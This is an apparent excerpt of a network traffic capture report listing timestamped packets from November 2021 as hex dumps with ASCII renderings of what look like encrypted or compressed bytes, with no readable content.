                                                                                    2021-11-23 13:42:55 UTC584INData Raw: fe 1d 0a 49 7d 71 2e 06 3b a3 94 e4 0a 78 51 56 fb 3d a6 ae 0e b9 87 84 e3 61 3c 5f b3 6b 17 9d 02 62 80 ee 41 e4 d0 aa 5a 67 a8 31 44 33 0f f6 04 9e 9b fb b0 dd 63 0b 1a c0 f1 b0 ac 89 d5 00 9f 66 93 06 c4 9c 22 ba e9 ca 3e 6d 26 99 94 3e 79 7b 59 3f 8f 19 86 04 85 05 dc a4 f6 26 3c d2 4f 4f 6b ac 79 4b 4e 7f 61 9e 4e 82 96 0c b8 c3 37 ed 77 6c 90 29 6c 53 2b 33 f7 5f b7 a8 bb a6 4d 58 9f 71 11 ab e2 8b 41 58 36 09 09 8f 24 4d 78 74 88 99 75 0e 6c 9e 6d 60 cb 5e 03 da 37 bf 0e 4a b3 0a 49 dc 4b b2 27 2d 9c ac 45 02 ce e5 8f 21 bc af fc 5e 47 e5 65 a5 93 a5 13 6b 45 3d ae e1 f9 43 b7 33 d3 67 50 cc 69 fb e6 07 e2 9a f2 c6 36 c1 a6 9f f6 e7 f2 8b 43 f8 a3 c7 a8 91 75 59 a4 a4 68 0a 81 91 90 3b 43 a3 99 f7 12 8f 7a 6d 7a 61 5c a5 1c eb e0 17 fd c3 13 3f 2c
                                                                                    Data Ascii: I}q.;xQV=a<_kbAZg1D3cf">m&>y{Y?&<OOkyKNaN7wl)lS+3_MXqAX6$Mxtulm`^7JIK'-E!^GekE=C3gPi6CuYh;Czmza\?,
                                                                                    2021-11-23 13:42:55 UTC586INData Raw: 9f 19 95 58 a5 35 b4 04 53 d6 14 ff 26 65 72 d5 2b 79 04 ec 97 21 7b 41 08 f4 73 67 da d3 a8 99 29 54 71 18 b3 10 81 7d d1 6c 65 9e 05 b8 21 b6 49 82 5e 07 7f ad 0b 5f c1 0b 4e 96 9a 2c a6 40 c0 b2 c4 ee ec ae a5 c7 df 26 7c 80 00 ce bd d9 c7 6c 6c 8c 20 6a 42 35 07 b8 42 9e f2 bc 2e 25 23 7f 0b e7 e6 d2 b4 74 18 1f d9 cc 20 57 a4 83 66 5d 75 c5 5c c7 0d 5e 12 db 1c 8a 72 de fc 7c f6 89 2d 72 66 5c 69 a4 e9 92 13 c9 d6 59 3a 22 39 ad e6 e4 c5 9b ff f9 b6 95 cb ff 6f 32 2f c1 c2 a1 60 43 fa 2e 4a 9b f1 f9 65 de 2f d9 d7 97 5c 84 9a 59 a1 70 82 4b 45 f5 d7 fb 51 55 0e 14 92 bc ea f8 9f c5 a2 1a c6 66 88 9c 7e 07 a2 be 4d 38 61 20 b4 a8 93 da 9d 65 47 4b 62 60 79 2c f3 da da a1 a5 32 f4 2c 03 0c 5e 85 5e 0f 0b 28 fe 3f db 4e 30 06 aa 91 ed 29 95 26 62 b9 0e
                                                                                    Data Ascii: X5S&er+y!{Asg)Tq}le!I^_N,@&|ll jB5B.%#t Wf]u\^r|-rf\iY:"9o2/`C.Je/\YpKEQUf~M8a eGKb`y,2,^^(?N0)&b
                                                                                    2021-11-23 13:42:55 UTC587INData Raw: 2e af e6 64 92 ea c7 d0 9d c0 15 9d 7d 1d 3e ba 3b a0 83 a9 da 67 b9 27 87 88 5c 3e 0d a2 32 fa 43 92 a1 c3 36 aa d4 ad 21 52 2b 8b 99 50 cd 5a 70 87 34 80 c7 c0 d3 45 33 09 97 34 e2 70 37 76 88 26 5d f5 88 cd cc c1 63 54 2e f3 d7 c8 f1 76 0d 7f f4 17 f2 21 44 cb bb 44 cf 8f 51 9b ac c7 45 2e bb 51 2c 5c f6 83 06 2c 19 06 67 12 cf 86 9f 9e 63 20 a6 dd 8e ec 5e 36 d6 d6 56 9e 3b 48 9b 49 2b 56 61 1b aa a5 f4 c9 7d b5 de 4d 01 26 ce 9c 5f 1f 2a e2 73 e3 79 c4 a0 00 b5 a2 2f e7 e0 48 ac b3 5f 3b 77 29 91 83 1e 80 d4 98 90 2c b6 55 7a 79 66 b5 a0 cf 16 66 59 d7 7c 35 6a dc ed 37 a2 eb 2b b5 7e b6 c8 f1 11 82 6f e7 55 42 cc 4a f6 2a be 1b b1 33 c4 15 2a 94 bc 43 7c bc a3 82 bb 82 9b 8c f8 67 83 09 b8 6f 29 39 8d 53 8f f3 75 12 c1 0f 5b 9b ce 32 f9 4c 45 d0 31
                                                                                    Data Ascii: .d}>;g'\>2C6!R+PZp4E34p7v&]cT.v!DDQE.Q,\,gc ^6V;HI+Va}M&_*sy/H_;w),UzyffY|5j7+~oUBJ*3*C|go)9Su[2LE1
                                                                                    2021-11-23 13:42:55 UTC588INData Raw: dd a7 fe 82 33 f7 6c 37 a3 0c e9 92 b5 4e ab 30 e5 eb 94 0b c6 d6 13 ce 79 e4 60 56 34 5c 58 03 dc 9d 32 25 8b 90 5e 35 8f e5 69 ca cc 56 1d 06 55 21 44 87 fd a8 9c fe 5b b5 c7 41 21 96 2e 83 2f 43 e1 ef 7d 8f d5 9b a4 48 0f e6 c0 97 dd 37 c0 d4 07 c0 06 6b a4 75 6f 06 be e1 3f eb 9a b6 a5 b0 99 37 23 d2 7a 29 5d e4 81 96 bb c8 17 b4 e0 2d 04 c6 0c 98 af a2 93 f1 79 68 11 a9 8e 0d 31 14 93 b5 b9 55 0d 20 64 70 cf 68 8d 8e 49 4b a7 00 06 f7 28 8e 88 f3 68 de 84 fd ae de ab 76 3b 3e f8 f4 7e 20 d3 bf 70 c1 94 98 1f 38 63 9c cc 43 37 f5 68 0f 83 3f a5 03 9d 9f 95 75 7d c2 d0 38 fe 46 a6 9e 5b bd 08 0f 87 b8 b7 75 bd c4 58 b3 db 8c f3 c9 79 eb d1 d3 dd 50 14 73 a3 7a a5 85 16 62 d8 81 e6 f6 f1 dc b0 c9 57 c5 00 3d 5a bc f1 12 f7 3a db 71 eb f6 51 93 e3 6f 43
                                                                                    Data Ascii: 3l7N0y`V4\X2%^5iVU!D[A!./C}H7kuo?7#z)]-yh1U dphIK(hv;>~ p8cC7h?u}8F[uXyPszbW=Z:qQoC
                                                                                    2021-11-23 13:42:55 UTC589INData Raw: 2b 16 86 14 1f c8 55 a5 30 6e d2 64 4d e6 90 40 ec 39 22 fe 8a d3 f9 d9 cc 5e 88 b2 99 dd c6 4e 69 2e d9 40 45 96 86 b7 0e 3b fd 97 4f e7 38 25 2c ae 1e fe 2e 26 2c 7a 75 10 a7 e5 4f 39 46 7f 95 cd b1 fb 3e 1f 51 91 a6 10 c0 b1 51 c5 05 e8 8f 45 af 10 b1 20 dd 28 ae cc 95 82 ea ee 23 7f a5 fa 52 d0 8c ab c0 07 2b 65 70 5c d3 6f 23 e7 60 48 59 5a c1 54 b4 c9 fe 2e bd 11 cb 98 3c 36 fb 8a 6b 95 c7 8f 64 03 43 86 5f 35 b4 2b a3 00 4d a5 78 88 0e 85 22 1c 66 5b 69 3f 4b 2a 9e 16 78 69 b3 8b 66 c6 9a 97 a3 b1 ea b0 13 40 98 93 65 c5 99 1a 5e 75 7c 0f e4 81 c0 5a 2e df b5 4c 5a ff ef be a1 57 bc 5b 0d 16 e8 a5 7d 2a 6a 6c 72 57 cf 94 c4 c5 22 f7 a6 e5 55 e8 91 15 52 af 05 54 b8 12 45 5b 17 ec 6a 24 62 a4 fc b5 dc e7 1d 48 99 1f e1 4f 5d 4f 5c 29 f2 6f 54 f3 ad
                                                                                    Data Ascii: +U0ndM@9"^Ni.@E;O8%,.&,zuO9F>QQE (#R+ep\o#`HYZT.<6kdC_5+Mx"f[i?K*xif@e^u|Z.LZW[}*jlrW"URTE[j$bHO]O\)oT
                                                                                    2021-11-23 13:42:55 UTC590INData Raw: 8a 01 ba 2a 03 42 f1 79 99 03 5d af a4 15 7e 5e db db 8f 9a f7 55 eb 07 f4 4c c5 d5 07 38 15 fb ff 32 d3 66 84 c1 2c 54 0c ed 78 9b e7 d4 bb 5e 68 88 12 ca 72 00 42 0e a7 b9 e1 2b 6a 4a 49 26 b2 b0 36 d7 8c 4c a4 b5 f9 cf c6 da 07 69 14 ad 4e 13 02 a9 6b 9c fb ef 23 35 51 49 65 bf cd a9 e5 34 34 7e 42 23 57 a3 cd 0b ce 4e 67 86 dd bd a0 55 89 eb bd 20 ef 22 20 15 03 c1 2d fa b1 86 3c 22 0f 98 47 5b d6 43 d3 72 c7 e6 d5 4c 26 62 6b 16 f5 c5 ff b9 a2 b3 e7 52 e6 2a a7 0c 6c c8 2c 7b 23 bc 41 49 2a 72 02 5e 65 d2 83 cd 8c 71 9c 5a 3b 0e ce 48 0d 67 b4 36 fb a3 ea 27 22 a2 e4 f8 22 d8 fb 3d 33 41 d5 fc 5e 96 73 42 f1 b1 5d 6f d6 ca 3c b7 87 3d 3a 82 66 41 88 c9 d8 38 e7 31 c5 96 04 74 f8 5f 35 76 09 39 28 c4 9c 2e a2 9e f4 76 3c 2f fd 91 c7 16 3a cd 63 8d f1
                                                                                    Data Ascii: *By]~^UL82f,Tx^hrB+jJI&6LiNk#5QIe44~B#WNgU " -<"G[CrL&bkR*l,{#AI*r^eqZ;Hg6'""=3A^sB]o<=:fA81t_5v9(.v</:c
                                                                                    2021-11-23 13:42:55 UTC591INData Raw: 3d 98 a6 ff 4f b9 ec f9 23 bc 22 6a 5f 27 2c 64 32 07 a3 68 16 4b a6 cd cf bf e3 fb bb 8f a2 4c 2e 39 c8 77 be 5b e7 81 2e 28 c1 2b 98 40 bc 15 72 d1 c9 59 4f f6 d4 6f 3b de ba a0 6e 81 9c 77 4e a4 84 2f 0d e0 62 06 f4 15 9e 0e fd b0 b4 8c 57 b6 a0 e1 ea 71 82 77 d3 a9 a0 df 74 86 df 2d 58 27 28 9b ac a5 6c ea 71 26 46 5a eb d0 60 e4 9e f0 0d cb 95 b7 18 c3 45 89 2b 02 b9 7a 49 47 c5 d5 0a 57 e5 da da 05 c8 d3 0d a8 85 83 41 20 47 c8 65 04 ad b2 f2 2b 5d 20 cc c8 f8 17 7d 6f 28 58 14 ee 61 24 93 53 eb 99 8c f1 75 4c cd fa fe d1 e9 95 78 40 b4 9e 09 46 42 9c 6d d0 0f 68 6d 34 8b a0 a2 f2 5c eb 2d e1 9d 09 05 f5 10 1c f1 76 2f 40 bd 8a 1c ce 75 1a 1b ac ba 70 df c7 d8 2a 64 77 4a c5 b3 40 e4 9b dc 77 13 d6 d4 3c 7c a8 fc d8 58 c8 1f b6 28 d1 1b b2 08 2a fe
                                                                                    Data Ascii: =O#"j_',d2hKL.9w[.(+@rYOo;nwN/bWqwt-X'(lq&FZ`E+zIGWA Ge+] }o(Xa$SuLx@FBmhm4\-v/@up*dwJ@w<|X(*
                                                                                    2021-11-23 13:42:55 UTC593INData Raw: c6 c4 19 2e 80 80 d5 e4 b7 a2 5b 9b f7 15 ca bc e2 9b f8 ed 80 96 c7 00 12 10 ff 20 67 ac 07 43 92 bb a8 8e c2 41 25 e5 38 6e ab ff 27 e2 a3 15 69 ef 37 90 c5 91 cb 0a 72 e6 f3 44 a9 64 e5 76 c5 e2 94 7b af b7 c7 c8 b2 d0 be 37 c9 d5 bd 24 41 c7 15 2e 94 95 5a cd 9c 1d af 7b 43 40 cf b7 f3 25 51 24 74 6f b7 f2 8b c2 49 6c 17 6f f8 58 bd a6 7d c5 c1 ae 08 7d 83 e6 3f e4 f4 c7 ee b7 93 d8 0b 01 a8 64 54 f8 fd 59 59 85 5b d5 cb af bb 4d d0 c5 f0 7f 64 46 64 3f 0b 23 de f1 fa 65 5c 3e 60 b8 b1 e2 1c 6e 53 08 c7 7b f7 25 ae 6c f1 74 b3 79 00 6c 34 2f 5b b3 1c 82 61 57 88 27 ad 84 c2 5f cd 83 00 f6 71 f2 e5 00 bc 77 5e 11 e8 9d bb ca 0c 7f 1f a6 7d fe d5 fb b6 dc 47 93 3d 82 aa 68 cb d1 e2 ae 85 78 19 f5 91 87 a7 56 55 3d 06 35 c5 60 31 5b 97 65 09 53 c5 13 e8
                                                                                    Data Ascii: .[ gCA%8n'i7rDdv{7$A.Z{C@%Q$toIloX}}?dTYY[MdFd?#e\>`nS{%ltyl4/[aW'_qw^}G=hxVU=5`1[eS
                                                                                    2021-11-23 13:42:55 UTC594INData Raw: 29 e1 53 e3 20 c4 96 ed d7 66 a1 c5 f2 79 36 0a ae 58 af 04 14 62 d8 4b bd b8 9c 11 33 17 9d d0 e9 3c 82 8c 40 c9 fb 1f 1c 1f 1d 54 66 ef a3 e3 c0 7e dc 6d e4 f5 c4 bc f8 90 2b ea 93 a3 2d 79 dc 97 52 cb a6 ce 27 f5 52 c9 21 bb 37 b3 5a 52 0a b0 b2 0b cf 3f bb 18 dc 9b ac 54 7b b5 45 c9 40 0e ea e0 a5 49 2f 29 7e bf bf 55 cf e8 0a c2 0d 59 f8 eb dc 98 df 19 13 07 0a 64 1b cc 3d 98 b1 8f 3a 8e 8a 27 e9 9a f5 a6 c6 e5 bb c8 43 85 c8 d2 6e 58 3e 44 f6 2f 04 3d 9c 13 a0 85 24 cb 7b 3d 6a a7 6a 12 f4 cf ff 8e d8 c1 4d 01 a8 6d 81 bc bb d5 da 79 43 99 dc 58 ee 2f ad ce f3 5c 61 6e b1 02 97 b6 24 cd 05 b3 73 d8 1a fe 1a 27 57 9b 7c 02 9e fd a4 f6 33 a7 b5 4e 24 1f a0 dd 74 70 0b 50 1c d8 36 ba 74 a6 53 59 a0 e4 31 7c d0 2f ef 74 0f e4 e7 24 d9 d4 36 b4 31 de 01
                                                                                    Data Ascii: )S fy6XbK3<@Tf~m+-yR'R!7ZR?T{E@I/)~UYd=:'CnX>D/=${=jjMmyCX/\an$s'W|3N$tpP6tSY1|/t$61
                                                                                    2021-11-23 13:42:55 UTC595INData Raw: 76 66 68 10 44 3c c7 bc f0 28 a3 1b 6f 38 d0 a7 1f dc 82 25 11 90 c2 25 3c b2 6d 41 9e c7 4e be 92 17 9d b0 81 33 4e 03 89 f7 88 10 09 5e d7 22 da f6 c3 c5 3b bd c8 02 d3 07 b7 06 b1 59 47 66 ee 35 0f 1a 01 01 ea e4 43 1b fd b6 e6 4e de 16 d1 5a f5 6b b4 4c a8 33 27 a8 1b d1 fa 52 7a e6 99 ff da 94 3e ef 85 ca 73 07 8c 4a 63 cc b8 fa 29 f0 17 ed 51 9b f6 e6 ed a8 0a 4a 2a 1e 15 6a 88 15 c3 50 ee 4f 71 b1 79 15 ed c8 6f f7 9d 9c 1c 4f ce 88 cc d6 17 1b d8 40 15 df cd 42 5a fb 6d 3e c8 d2 13 34 67 4a 72 3d 14 27 30 20 c1 ee 9b 31 a8 a9 52 97 04 74 cd 11 f8 f5 59 5f ba 1f 42 1b 2d e5 9c e0 4a 18 c7 85 19 03 89 5a 98 0b 5f e9 e8 99 65 1a d6 ce a3 ba f1 65 3c 55 e4 b1 5f 6b a8 73 0f 51 ce 94 97 53 3a 26 d5 72 4c ae ab f0 8c 72 2f 42 ae 4c ce 9e 4d d4 7c a9 c0
                                                                                    Data Ascii: vfhD<(o8%%<mAN3N^";YGf5CNZkL3'Rz>sJc)QJ*jPOqyoO@BZm>4gJr='0 1RtY_B-JZ_ee<U_ksQS:&rLr/BLM|
                                                                                    2021-11-23 13:42:55 UTC596INData Raw: a0 13 aa 97 41 42 89 b5 73 04 00 8e e9 2c 15 79 cb f3 e8 33 f0 1c b2 85 0f 91 a9 91 40 2f 27 c6 d4 00 8f 5f b0 31 8b af 0b 9d 29 6e 2a 9c 92 ae ea 9d 42 a0 8f d9 d3 49 3c 27 89 fd 0b 12 f0 f6 e5 b9 de df c7 47 72 72 f4 b6 55 c8 b2 23 08 df 50 00 e6 ff 4f 2b 2a 59 b7 48 30 ed 10 23 c5 1d ec cf 7e df f6 a3 6c c0 9b bd da be 3c 90 77 93 a8 96 63 81 a4 82 ce 43 ea fc 00 38 61 6f 1c 3a 8b 2e a6 c1 05 7a 1d cc 25 c2 37 e9 3a ec b6 a2 a5 e9 3e aa 73 87 82 bb c9 52 88 bb 9a 10 98 1e d9 d8 f4 38 ca 18 10 c0 db 4f 01 7c e0 4b 2e f0 2b ab ef 17 4c fd 49 11 57 48 c1 da 7e dc 84 86 e4 e4 ea f3 97 49 f4 49 fe cc 86 18 0a 00 1e 19 b2 f4 b6 76 50 f1 b3 58 33 5f 4f c6 86 ac 52 34 09 a6 1b 80 49 dd f5 1d 32 33 7e 88 22 39 7f 5f 06 cf 9e 10 b2 c8 e7 5c c8 53 a3 d1 ae 71 5a
                                                                                    Data Ascii: ABs,y3@/'_1)n*BI<'GrrU#PO+*YH0#~l<wcC8ao:.z%7:>sR8O|K.+LIWH~IIvPX3_OR4I23~"9_\SqZ
                                                                                    2021-11-23 13:42:55 UTC598INData Raw: 4e a1 20 ae bd 94 47 01 3b 30 4a 81 4c 91 d8 c4 30 75 2e 1e ec 99 b4 1f 6f 94 82 ef 2b ed ce 75 5b 25 6d cb a6 1a 58 56 9a be 4a c5 83 16 8e 40 9e a6 07 e0 95 d7 90 c3 e5 77 3a 79 6e df 7e 56 70 b1 4e 44 09 7a 26 6f 30 8d 3e ca 0a 5a 70 11 d2 4a 55 07 78 01 25 f8 9f e0 8a 5b 4d d0 de 24 56 40 97 5d 50 82 40 95 e6 1a 36 f0 00 5f c2 62 f2 46 de 9d 8d 28 03 78 ba 6b 72 63 ad ea 9f 90 a2 93 17 1d 5a 80 1c 0f 5e 9a 24 41 ab d9 bc e8 80 f4 70 7e 81 d9 d8 4f 1a 01 7e 45 58 ba ab dc c6 ee ff 1f e1 47 85 88 44 bb ad 49 1b cd 34 e9 02 51 f3 19 44 12 c2 b7 9c c2 18 4b 79 dc cd 3d aa 85 a5 a8 73 ca f9 0b 09 e3 f9 b1 d9 db e4 73 e2 11 26 e4 47 31 5a 7f be 7c ef 4d 03 0a 1e 0f fd c3 6d 5d ab f0 c6 72 92 fe a9 85 8f 24 f1 41 91 78 34 21 b7 bc db 76 1d 72 42 6b ff d4 00
                                                                                    Data Ascii: N G;0JL0u.o+u[%mXVJ@w:yn~VpNDz&o0>ZpJUx%[M$V@]P@6_bF(xkrcZ^$Ap~O~EXGDI4QDKy=ss&G1Z|Mm]r$Ax4!vrBk
                                                                                    2021-11-23 13:42:55 UTC599INData Raw: c9 ab 94 c1 f0 54 d0 de 12 f2 f7 3f ab e4 0a 27 00 84 fa 10 84 c3 55 2c 82 62 a8 fd 7b 52 5d fc 50 74 b4 c5 2f be a3 5c 5b b5 17 50 d4 97 24 61 a7 53 92 7d 1c d0 f1 c2 73 0c a9 b7 90 13 45 1e 76 bb ee 67 a7 5c f1 83 cb fe c8 f8 ee 62 58 83 e5 0e 70 90 e6 79 28 75 c2 54 86 7b d7 a2 e3 32 bb ef 4f 0a 14 7e 79 8f f8 19 64 60 44 57 e4 a9 1b 74 87 73 6d a0 e8 d2 1a 5d f3 3f b2 39 df 82 da 81 2d 42 20 d6 e5 e1 da 57 a8 2e 3f d2 d1 38 49 9f ea 4c b7 66 10 f1 ef 21 41 ab c3 48 0d 14 0c 6a 0e 10 75 f9 6e 00 ba 2d c4 21 0a e6 2d 09 a5 12 1c d0 e8 67 9b ee 6d 3a 16 08 e8 32 d4 d0 ab 86 78 11 87 af 9b 61 f8 b0 e2 40 3d 5d 32 6f 8f e7 0a 26 2f 49 cd 26 a1 c0 0f 1f 79 26 97 b8 e4 b8 61 20 4a 88 48 29 6a 66 f3 32 4c e7 be 9c 76 60 cd 48 6f 0b 28 ba db 25 56 9c d9 94 6e
                                                                                    Data Ascii: T?'U,b{R]Pt/\[P$aS}sEvg\bXpy(uT{2O~yd`DWtsm]?9-B W.?8ILf!AHjun-!-gm:2xa@=]2o&/I&y&a JH)jf2Lv`Ho(%Vn
                                                                                    2021-11-23 13:42:55 UTC600INData Raw: 6a 4e 08 3d 63 7e 4d a3 d8 8d bf bc 45 a6 0b f4 a0 5b 04 83 90 b1 46 b0 bd 14 41 61 99 5c af a7 16 d1 71 4c 7d 24 89 72 22 44 96 52 7f 9f ed d1 65 fe ab b5 ad 73 e2 ce c6 6f 30 24 c6 b6 49 5f cc 05 5a a0 48 e8 e8 d1 3d a6 95 99 70 1d 0f 0b a7 56 6a 12 4a 27 27 1f ee 8b c0 7b 97 8e a8 04 3c f4 03 b8 44 d7 d2 15 bf 63 5a 18 13 ab ac fd 02 75 b6 d9 23 4a 49 c4 21 25 9b 3d a8 d2 dd 83 58 79 1d f7 d0 72 1f dd 11 cf eb 03 91 11 e1 17 18 ec 0f eb 37 fb de 8c c0 89 39 ee 3d d8 a5 4f b0 ae 35 f3 b4 fd 80 e4 31 94 55 78 80 86 55 01 c3 63 a1 a0 36 bf dc c1 a4 b1 22 67 d5 53 fb 45 cf 4c df e7 cf 02 21 81 a3 4f d1 83 66 52 7b 0c 40 f4 0e 40 07 ed 77 b9 02 38 f3 42 8e 76 4f 65 e8 f2 ea a3 af e5 c5 92 64 68 f1 dc d1 6f 8c 4c 88 a2 f2 d0 72 6d 85 7a a1 f0 c0 4d 8a 5e 97
                                                                                    Data Ascii: jN=c~ME[FAa\qL}$r"DReso0$I_ZH=pVjJ''{<DcZu#JI!%=Xyr79=O51UxUc6"gSEL!OfR{@@w8BvOedhoLrmzM^
                                                                                    2021-11-23 13:42:55 UTC602INData Raw: 28 9a a2 db 85 70 97 7a 8a ac f6 31 31 58 e3 24 16 51 27 1e 34 f0 dd 20 dc c4 ee ae 0c 2c 5f 19 65 f7 e3 85 20 98 0a 5a a4 4a a1 ff a4 20 28 00 63 5f ec ed 29 c1 cf 34 03 ab 26 7d c7 aa 8c 16 25 29 42 fd 98 33 3b 64 70 36 3f 51 16 f1 9f 6c f8 2c 1a 98 29 88 f2 95 78 cf c9 f1 ee 7f 01 b3 55 91 26 15 1e 0f 1d bd 9f b9 20 59 07 a0 4d ad 0d 75 11 91 25 45 4a b6 09 e1 ee ea 67 86 fc a1 29 c4 cc a4 94 02 3d 8d 02 ab 30 a9 6e 60 50 9f 51 5a 1e 0a 98 04 29 67 42 e1 54 ad 5f a0 b4 c0 e4 68 29 bd 87 8f a0 2d b4 1e 04 43 19 fc 9f 18 b5 95 1a d4 82 fe a2 db 70 23 8b a3 dd 77 f0 d5 d8 8c 22 f3 3b 48 a5 f4 cc b5 a2 b8 15 3f 1e 60 16 7a 17 e9 cc ab 7a 5d aa 0d 09 a6 1b a6 4b f8 4f 69 62 b5 b8 57 bd 37 f5 41 37 37 fc 47 7d e3 02 c6 d0 c1 c2 95 4c 0f c6 91 39 67 8d e4 22
                                                                                    Data Ascii: (pz11X$Q'4 ,_e ZJ (c_)4&}%)B3;dp6?Ql,)xU& YMu%EJg)=0n`PQZ)gBT_h)-Cp#w";H?`zz]KOibW7A77G}L9g"
                                                                                    2021-11-23 13:42:55 UTC603INData Raw: de 20 5a 34 f7 4e f9 c0 ca 9b 14 4f 33 46 dd e8 77 b0 67 cd 66 5f 2a 25 c2 6c 1b c3 c4 d7 0d 39 4d 9c f6 f0 9d d5 b3 4a 84 cc f8 ad 02 31 38 2d e4 35 fd 88 4c 61 cb 4b 01 18 59 1a 15 33 0c 8f a6 bb 9a a0 2f 7c 6c 48 90 0b ca 4f c3 a2 cc 76 c7 f1 12 4b 32 c2 2b 01 11 0c c6 fd 1b f8 83 7b 48 65 0d 29 3c 29 a2 60 63 c8 5c 78 7c 09 a4 fe 03 b1 9a 6c e8 3a 1d b4 d0 88 c0 46 31 c6 0a a8 e6 8a af f5 c0 8c 28 0d 76 f0 bc 95 fb 63 62 a6 d6 78 91 4d ff 42 31 4f fd 06 1d f3 77 2a 82 5f c6 59 81 81 2c 75 62 43 45 21 3f 41 9e fb 2c e5 24 5b 2b 3c d1 2b 27 69 e5 64 54 02 9e 0f 05 ef 1a 2d ca 8e b4 34 6f 47 11 7e 28 bf 8b ef d6 2c 42 f2 6a 16 d1 37 37 66 5a 7a 04 a5 58 1d 21 cf 67 cf 8a fd c7 7a 3a 9b 56 8a 1a 94 bc 95 43 58 92 f4 14 cf 48 07 03 a7 9a 9b 91 14 e0 8f 8b
                                                                                    Data Ascii: Z4NO3Fwgf_*%l9MJ18-5LaKY3/|lHOvK2+{He)<)`c\x|l:F1(vcbxMB1Ow*_Y,ubCE!?A,$[+<+'idT-4oG~(,Bj77fZzX!gz:VCXH
                                                                                    2021-11-23 13:42:55 UTC604INData Raw: d5 98 14 70 99 7e ee 56 79 0f 65 af 9a 1d 79 f6 1b 74 37 06 1e 85 13 8a 4d 76 1f f8 df 8a e1 af 8b bd 83 04 99 05 23 de e9 65 8e 41 e4 0c 5f 45 02 26 d0 0e f0 c7 75 d8 31 e2 b5 76 e0 c7 e1 a8 7f 97 18 84 c8 dc d9 31 f8 1d 4f 60 45 c4 1d b8 e4 e4 f5 56 e5 3a 5a c6 c4 e0 b2 cc 9c a5 b1 57 d9 32 50 e6 8a 11 f1 b8 bc cb 70 32 4d dc 19 fc 01 26 48 14 3e ae 06 74 08 75 c9 73 82 d8 db 57 9f 71 d1 db f3 66 b6 7a 67 ab 99 07 0f 4e 74 53 d1 9e a6 e5 88 bb 7c a5 28 47 43 0b 88 8c 6c 3a b4 3b 53 c8 4f 03 9a f2 67 72 f1 df 67 b9 14 fa 7d e1 73 07 60 1a e9 f9 d4 48 79 6e 9e 24 1a a9 cb 8e be 95 ff 8f 8c 8e e4 94 6d e6 55 73 04 c0 a4 89 bb 84 20 74 1f 17 c1 a9 5e f6 e2 77 6f da 23 19 f6 cc 47 79 bc 61 b2 0d bc df d6 18 b4 e9 98 25 ab 07 fb f7 6d a8 09 9a e5 01 c0 c9 5a
                                                                                    Data Ascii: p~Vyeyt7Mv#eA_E&u1v1O`EV:ZW2Pp2M&H>tusWqfzgNtS|(GCl:;SOgrg}s`Hyn$mUs t^wo#Gya%mZ
                                                                                    2021-11-23 13:42:55 UTC605INData Raw: 8d d1 0d 4f b9 6c 58 93 ac 49 11 99 5b 25 b4 85 b2 7b 0c 0c bf b0 a1 21 25 ed 2c ac a9 60 0e bc 7d 3d f6 21 77 33 de 3e b8 5c 6c a7 5e 9d fd 1e 40 ca 5a aa 8f 18 6d 29 e0 df 73 f1 54 02 f1 7f 70 6d 34 cd fd c4 66 c0 7f 3f 34 1e 47 e1 69 c7 0d 2d ac 0c 79 e4 8b 46 3a 54 55 f3 e2 a4 3a 24 53 7e 85 61 5e 9a 35 c7 40 e7 e2 e8 6f b2 cc 07 73 c0 74 1f 88 4a 1b 5c d4 23 40 d4 30 d7 9b 97 45 24 f0 89 33 84 44 f7 68 72 13 7b f4 e3 6b 01 11 a7 81 cb 29 ce 8c 6f e7 98 9a 2a 5f b3 30 95 d6 de bd 46 03 97 1c 8f 64 df 2b e9 fb 63 9e 1d db fd de 1e 28 4c 17 5c d2 5d 2d 9e c2 9b da 6e cf 3a a9 2c e0 53 62 7b ab bf 9c 83 cf 3f ef d6 b2 2b 8a f1 89 96 18 4d 93 a0 48 23 2b 46 8c 1b e2 f3 93 f0 a2 e7 f5 dc 7e 9b 52 06 c6 e0 0d f7 c7 a2 89 de f6 61 4f 66 2e 99 60 14 35 cd 1b
                                                                                    Data Ascii: OlXI[%{!%,`}=!w3>\l^@Zm)sTpm4f?4Gi-yF:TU:$S~a^5@ostJ\#@0E$3Dhr{k)o*_0Fd+c(L\]-n:,Sb{?+MH#+F~RaOf.`5
                                                                                    2021-11-23 13:42:55 UTC606INData Raw: c6 51 19 4f 73 4e fe e4 ee 89 8c 8c 34 e0 b7 1c f4 9f 5d 86 b9 ee 4d 38 ef 88 f2 dd 24 52 30 e0 e9 6f 61 bd f1 3e 02 a4 85 5c ac 4c b6 98 cb 6c c4 07 38 ea 47 9c f9 df 22 d8 98 d4 00 58 1a 26 37 15 d0 ae 48 17 34 f8 80 c9 9f e9 26 09 60 44 e3 56 5f 0b 7f fb e2 c4 f3 6e d2 d8 60 8a 3b cf e9 8d fd b6 0f ba 6d 93 7e 23 50 35 fb 93 d5 31 c8 4d 31 58 e4 b3 63 6e c5 66 48 68 65 52 62 a7 f2 0a 00 2c 44 1e 22 47 f3 14 cd 6b 0f 76 fb 38 5c a7 7d 06 da 27 93 1e 68 21 54 09 8f fd a8 4c 22 6a 2c 8a fa c0 fe 80 e0 f4 3e 9e d2 d5 76 86 7d 94 44 2f 76 79 54 66 5b 40 f4 b2 2f 9a 3c ef 5e ef 6a 0d 28 03 2d e8 f2 a6 0c 3e b8 dd 90 ce 81 39 ba 2f df 57 ed eb ad 50 22 ab 93 13 2f 20 49 8e 93 ea 42 9c 11 3c ee 74 81 20 c1 33 50 f5 53 4b 43 b2 08 07 15 69 e8 9d 81 28 23 84 55
                                                                                    Data Ascii: QOsN4]M8$R0oa>\Ll8G"X&7H4&`DV_n`;m~#P51M1XcnfHheRb,D"Gkv8\}'h!TL"j,>v}D/vyTf[@/<^j(->9/WP"/ IB<t 3PSKCi(#U
                                                                                    2021-11-23 13:42:55 UTC607INData Raw: 79 f5 b5 a4 11 7d d2 72 0c 06 e3 c9 f9 9b fe 17 a7 4b 62 48 22 10 68 4a 1c 84 30 03 46 60 cc 9b 08 0d 15 3a 03 38 04 ad 06 99 fd 2e b0 bb b4 15 d2 78 d1 b9 b5 d9 8f 32 1c 10 b8 b5 43 18 64 1f db 2d 80 65 36 92 33 6b 4b ac d6 da a8 fb ed de f4 cf e1 79 83 a2 77 37 a8 16 b2 75 f8 a4 cb 81 d6 b1 9d d3 89 3c 75 ff 85 73 ec ee 96 e0 6b 50 a8 18 80 84 e5 dc 40 50 22 41 7d 7d fc d9 e6 df 01 54 54 e0 a4 91 33 4a 0e 0d 5e 51 f9 e2 65 68 25 e7 ec 6a eb 9e 53 45 ce f7 5a 49 f6 88 06 7d 93 12 84 06 6a f4 5e ff e4 9d 6e b9 cd 73 ca b4 88 65 44 8b 6b 99 40 ef 17 1b 1a cd 